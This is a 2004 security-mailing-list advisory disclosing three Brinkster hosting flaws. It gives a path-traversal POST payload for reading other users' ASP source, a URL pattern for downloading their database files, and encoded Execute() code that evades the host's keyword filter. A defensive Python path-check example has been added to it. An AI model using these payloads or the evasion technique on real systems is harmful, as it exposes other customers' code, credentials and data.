[VulnWatch] Brinkster Multiple Vulnerabilities

From: Ferruh Mavituna (ferruh@private)
Date: Sun Feb 08 2004 - 13:10:10 PST


    ------------------------------------------------------
    BRINKSTER MULTIPLE VULNERABILITIES
    ------------------------------------------------------
    Online URL : http://ferruh.mavituna.com/?435
    
    1. Retrieving Other Users' ASP Source Code
    Severity: Highly Critical
    
    2. Accessing Database Files
    Severity: Medium Critical
    
    3. Skipping Brinkster Code Controls
    Severity: Low Critical
    
    
    ------------------------------------------------------
    ABOUT BRINKSTER;
    ------------------------------------------------------
    Brinkster is a popular free and paid Windows-based web hosting
    company with many customers.
    www.brinkster.com
    
    ------------------------------------------------------
    VULNERABLE;
    ------------------------------------------------------
    Currently (1/26/2004) Brinkster.com is vulnerable;
    
    ------------------------------------------------------
    1. RETRIEVING OTHER USERS' ASP SOURCE CODE
    ------------------------------------------------------
    Any valid user can access other users' source code just by knowing
    the file names. So an attacker can obtain ASP source code, database
    passwords and other information contained in that source.

    This problem is in the Brinkster File Manager
    (http://www.brinkster.com/FileManager.asp). The File Manager Edit page
    (http://www.brinkster.com/FileManagerEdit.asp) allows an attacker to
    access other users' files by modifying the POST request.
    
    	------------------------------------------------------
    	URL	: http://www.brinkster.com/FileManagerEdit.asp
    	POST	: faction=editfile&file2edit=%5C..%5C[VICTIM USERNAME]%5C[FILE TO READ AS TEXT]
    	------------------------------------------------------
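
    A defender's view of the file2edit problem above, as an added example
    that is not part of the advisory: the submitted parameter is URL-decoded,
    resolved against the authenticated user's own directory with Windows
    path semantics, and rejected unless it stays inside that directory. The
    users root, the usernames and the request values are constructed for
    illustration and are not Brinkster's.

```python
import ntpath
from urllib.parse import unquote

# Constructed example layout: every hosting customer owns one
# directory under this root (hypothetical path, not Brinkster's).
USERS_ROOT = r"C:\inetpub\wwwroot\users"


def resolve_user_file(username, file2edit):
    """Map a file2edit parameter to a file inside the caller's own
    directory. Returns the absolute path, or None when the request
    would escape that directory (e.g. the %5C..%5C pattern above).
    `username` must come from the authenticated session, never
    from the request body."""
    user_root = ntpath.normpath(ntpath.join(USERS_ROOT, username))

    # The parameter arrives URL-encoded (%5C is a backslash). Decode it
    # once, then treat it as relative to the user's root whatever it
    # claims to be, by stripping any leading separators.
    requested = unquote(file2edit).lstrip("\\/")

    # Join first, then normalise, so ".." segments are collapsed with
    # Windows (ntpath) semantics, the way the IIS host resolves them.
    candidate = ntpath.normpath(ntpath.join(user_root, requested))

    try:
        inside = ntpath.commonpath([user_root, candidate]) == user_root
    except ValueError:
        # A different drive letter can never be under the user's root.
        inside = False

    if not inside or candidate == user_root:
        return None
    return candidate


if __name__ == "__main__":
    # Constructed requests: one legitimate, one with the traversal
    # pattern from the advisory, one pointing at another drive.
    for param in ("default.asp", "%5C..%5Cvictim%5Cdefault.asp", "D:%5Cother.txt"):
        print(param, "->", resolve_user_file("alice", param))
```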
    
    ------------------------------------------------------
    2. ACCESSING DATABASE FILES
    ------------------------------------------------------
    If you know the name of any Brinkster user's database file you can
    download it. (You can find the database name in the source code; see
    the first vulnerability.)

    	------------------------------------------------------
    	Database URL;
    	http://[BrinksterServer].brinkster.com/[Username]/db/[DatabaseFileName]
    	------------------------------------------------------
    
    
    ------------------------------------------------------
    3. SKIPPING CODE CONTROLS
    ------------------------------------------------------
    Brinkster does not allow some code snippets in ASP files, for server
    performance reasons, like "Server.ScriptTimeout = 8000". The Brinkster
    File Manager automatically scans your uploaded source code and, if it
    finds any restricted keyword, deletes your uploaded file.

    You can skip this by using the ASP built-in Execute() function. This
    function is not on the Brinkster keyword blacklist. So write a simple
    encoder and decoder for your code and run it through Execute().
    
    
    	------------------------------------------------------
    	Proof of Concept;
    	------------------------------------------------------
    	1) Simple method without Execute();
    	<%
    	 ' The keyword is split with the VBScript "_" line-continuation character
    	 On _
    	 Error Resume Next
    	%>

    	2) Another method with Execute();
    	<%
    	Dim onErrorStr
    	onErrorStr = "S e r v e r.S c r i p t T i m e o u t-E r r o r-R e s u m e-N e x t"
    	' Remove the spaces, then turn the dashes back into spaces before executing
    	Execute(Replace(Replace(onErrorStr," ",""),"-"," "))
    	%>

    	3) Another one with ASCII values and Execute();
    	This code allows you to set "Server.ScriptTimeout";
    	<%
    	Dim converted
    	' Each character of the statement encoded as a three-digit ASCII code
    	Const errStr = "083101114118101114046083099114105112116084105109101111117116032061032057048048048048048048048048"
    	converted = Asc2Str(errStr)
    	Execute(converted)

    	Response.Write converted

    	' Decode a string of three-digit ASCII codes back into text
    	Function Asc2Str(byVal text)
    		Dim converted, character, i
    		For i = 0 to Round((Len(text)-1)/3,0)
    			If Len(text) > 2 Then
    				character = Chr(Left(text,3))
    				converted = converted & character
    				text = Right(text,Len(text)-3)
    			End If
    		Next
    		Asc2Str = converted
    	End Function
    	%>
    	------------------------------------------------------
    	// --
    	------------------------------------------------------
    
    
    
    ------------------------------------------------------
    HISTORY;
    ------------------------------------------------------
    01.01.2004 - Discovered
    01.18.2004 - Vendor Informed
    02.08.2004 - Published

    ------------------------------------------------------
    Vendor Status;
    ------------------------------------------------------
    2 e-mails, no answer.
    
    
    Ferruh Mavituna
    Web Application Security Specialist
    http://ferruh.mavituna.com
    
    



    This archive was generated by hypermail 2b30 : Mon Feb 09 2004 - 14:32:13 PST